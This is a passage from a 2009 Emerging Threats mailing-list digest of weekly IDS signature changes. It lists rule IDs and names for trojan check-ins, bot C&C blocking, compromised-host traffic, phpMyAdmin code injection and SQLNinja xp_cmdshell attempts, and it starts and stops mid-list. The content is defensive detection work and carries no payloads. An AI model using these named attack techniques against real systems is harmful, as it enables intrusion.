2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500179 || ET COMPROMISED Known Compromised or Hostile
Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-sid-msg.map.txt (48): 2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - 
BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (95) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From emerging at emergingthreats.net Sat Aug 8 18:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sat, 8 Aug 2009 18:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Weekly Signature Changes
Message-ID: <20090808220012.5D62E4504A@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sat Aug 8 18:00:12 2009 [***]

[+++] Added rules: [+++]

2009704 - ET TROJAN Generic Downloader Check-in (emerging-virus.rules)
2009705 - ET MALWARE W3i Related Adware/Spyware (emerging-malware.rules)
2009706 - ET POLICY Nessus Vulnerability Scanner Plugins Update (emerging-policy.rules)
2009709 - ET WEB phpMyAdmin Setup Code Injection (phpinfo) (emerging-web.rules)
2009710 - ET WEB phpMyAdmin Setup Code Injection (system) (emerging-web.rules)
2009711 - ET TROJAN Win32.Runner (Often Rootkit) - POST (emerging-virus.rules)
2009712 - ET MALWARE Adware PlusDream - GET Config Download/Update (emerging-malware.rules)
2009713 - ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected (emerging.rules)

[///] Modified active rules: [///]

2002997 - ET WEB PHP Remote File Inclusion (monster list http) (emerging-web.rules)
2003520 - ET WEB EXPLOIT webCalendar Remote File include (emerging-web.rules)
2009041 - ET SCAN SQLNinja MSSQL Database User Rights Scan (emerging-scan.rules)
2009042 - ET SCAN SQLNinja MSSQL Authentication Mode Scan (emerging-scan.rules)
2009043 - ET SCAN SQLNinja Attempt To Recreate xp_cmdshell Using sp_configure (emerging-scan.rules)
2009044 - ET SCAN SQLNinja Attempt To Create xp_cmdshell Session (emerging-scan.rules)
2009126 - ET TROJAN Win32/Monkif Downloader Checkin (emerging-virus.rules)
2009531 - ET TROJAN Garmania Trojan Check-in (emerging-virus.rules)
2009532 - ET TROJAN Unknown Trojan Check-in (3) (emerging-virus.rules)
2009670 - ET WEB Nagios statuswml.cgi Remote Arbitrary Shell Command Injection attempt (emerging-web.rules)
2009694 - ET TROJAN Navipromo related update (emerging-virus.rules)
2402000 - ET DROP Dshield Block Listed Source (emerging-dshield.rules)
2403000 - ET DROP Dshield Block Listed Source - BLOCKING (emerging-dshield-BLOCK.rules)
2404000 - ET DROP Known Bot C&C Server Traffic (group 1) (emerging-botcc.rules)
2404001 - ET DROP Known Bot C&C Server Traffic (group 2) (emerging-botcc.rules)
2404002 - ET DROP Known Bot C&C Server Traffic (group 3) (emerging-botcc.rules)
2404003 - ET DROP Known Bot C&C Server Traffic (group 4) (emerging-botcc.rules)
2404004 - ET DROP Known Bot C&C Server Traffic (group 5) (emerging-botcc.rules)
2404005 - ET DROP Known Bot C&C Server Traffic (group 6) (emerging-botcc.rules)
2404006 - ET DROP Known Bot C&C Server Traffic (group 7) (emerging-botcc.rules)
2404007 - ET DROP Known Bot C&C Server Traffic (group 8) (emerging-botcc.rules)
2404008 - ET DROP Known Bot C&C Server Traffic (group 9) (emerging-botcc.rules)
2404009 - ET DROP Known Bot C&C Server Traffic (group 10) (emerging-botcc.rules)
2404010 - ET DROP Known Bot C&C Server Traffic (group 11) (emerging-botcc.rules)
2404011 - ET DROP Known Bot C&C Server Traffic (group 12) (emerging-botcc.rules)
2404012 - ET DROP Known Bot C&C Server Traffic (group 13) (emerging-botcc.rules)
2404013 - ET DROP Known Bot C&C Server Traffic (group 14) (emerging-botcc.rules)
2404014 - ET DROP Known Bot C&C Server Traffic (group 15) (emerging-botcc.rules)
2404015 - ET DROP Known Bot C&C Server Traffic (group 16) (emerging-botcc.rules)
2404016 - ET DROP Known Bot C&C Server Traffic (group 17) (emerging-botcc.rules)
2404017 - ET DROP Known Bot C&C Server Traffic (group 18) (emerging-botcc.rules)
2404018 - ET DROP Known Bot C&C Server Traffic (group 19) (emerging-botcc.rules)
2404019 - ET DROP Known Bot C&C Server Traffic (group 20) (emerging-botcc.rules)
2404020 - ET DROP Known Bot C&C Server Traffic (group 21) (emerging-botcc.rules)
2404021 - ET DROP Known Bot C&C Server Traffic (group 22) (emerging-botcc.rules)
2404022 - ET DROP Known Bot C&C Server Traffic (group 23) (emerging-botcc.rules)
2404023 - ET DROP Known Bot C&C Server Traffic (group 24) (emerging-botcc.rules)
2404024 - ET DROP Known Bot C&C Server Traffic (group 25) (emerging-botcc.rules)
2405000 - ET DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405001 - ET DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405002 - ET DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405003 - ET DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405004 - ET DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405005 - ET DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405006 - ET DROP Known Bot C&C Traffic (group 7) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
2405024 - ET DROP Known Bot C&C Traffic (group 25) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)

[---] Disabled and modified rules: [---]

2009702 - ET CURRENT_EVENTS POLICY DNS Update From External net (emerging.rules)

[+++] Added non-rule lines: [+++]

-> Added to emerging-malware.rules (2):
# ref: f6a78be315d98ba8df4e72296ac8ec0c
# ref: a9036ae5d9bb8e3c53d5e0126d448d1d

-> Added to emerging-sid-msg.map (9):
2009126 || ET TROJAN Win32/Monkif Downloader Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Monkif || url,doc.emergingthreats.net/2009126 || url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDownloader%3aWin32%2fMonkif.C
2009704 || ET TROJAN Generic Downloader Check-in || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009704
2009705 || ET MALWARE W3i Related Adware/Spyware || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_Freeze.com || url,doc.emergingthreats.net/2009705 || url,www.tallemu.com/oasis2/vendor/w3i__llc/623302
2009706 || ET POLICY Nessus Vulnerability Scanner Plugins Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Nessus || url,doc.emergingthreats.net/2009706 || url,www.nessus.org/plugins/ || url,www.nessus.org/nessus/
2009709 || ET WEB phpMyAdmin Setup Code Injection (phpinfo) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHPMyadmin || url,doc.emergingthreats.net/2009709
2009710 || ET WEB phpMyAdmin Setup Code Injection (system) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHPMyadmin || url,doc.emergingthreats.net/2009710
2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html
2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update
2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2

-> Added to emerging-sid-msg.map.txt (9):
2009126 || ET TROJAN Win32/Monkif Downloader Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Monkif || url,doc.emergingthreats.net/2009126 || url,www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=TrojanDownloader%3aWin32%2fMonkif.C
2009704 || ET TROJAN Generic Downloader Check-in || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009704
2009705 || ET MALWARE W3i Related Adware/Spyware || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_Freeze.com || url,doc.emergingthreats.net/2009705 || url,www.tallemu.com/oasis2/vendor/w3i__llc/623302
2009706 || ET POLICY Nessus Vulnerability Scanner Plugins Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Nessus || url,doc.emergingthreats.net/2009706 || url,www.nessus.org/plugins/ || url,www.nessus.org/nessus/
2009709 || ET WEB phpMyAdmin Setup Code Injection (phpinfo) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHPMyadmin || url,doc.emergingthreats.net/2009709
2009710 || ET WEB phpMyAdmin Setup Code Injection (system) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHPMyadmin || url,doc.emergingthreats.net/2009710
2009711 || ET TROJAN Win32.Runner (Often Rootkit) - POST || url,www.threatexpert.com/threats/trojan-win32-runner.html || url,www.spywarecease.com/spyware-list/Spyware_Trojan.Win32.Runner.s.html
2009712 || ET MALWARE Adware PlusDream - GET Config Download/Update
2009713 || ET CURRENT Possible W32/Dozer Trojan Backdoor CnC Communication Detected || url,myitforum.com/cs2/blogs/cmosby/archive/2009/07/22/born-on-the-4th-of-july-symantec-security-blogs.aspx || url,www.symantec.com/norton/security_response/writeup.jsp?docid=2009-070814-5311-99&tabid=2

-> Added to emerging-virus.rules (2):
# ref: 0f79f76f0ea1d53690ed916142f94083
# ref: 14d98e50d25dfc3c1bc011c2856ac1a8

-> Added to emerging-web.rules (1):
#by dxp

[---] Removed non-rule lines: [---]

-> Removed from emerging-sid-msg.map (129):
2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126
2500170 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (86) ||
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500171 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500172 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500173 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500174 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500175 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500176 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500177 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500178 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500179 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500180 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500181 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500182 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500183 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500184 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (93) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500185 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500186 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500187 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500188 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500189 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500190 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500191 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500192 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500193 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500194 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500195 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500196 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500197 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500198 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (100) || 
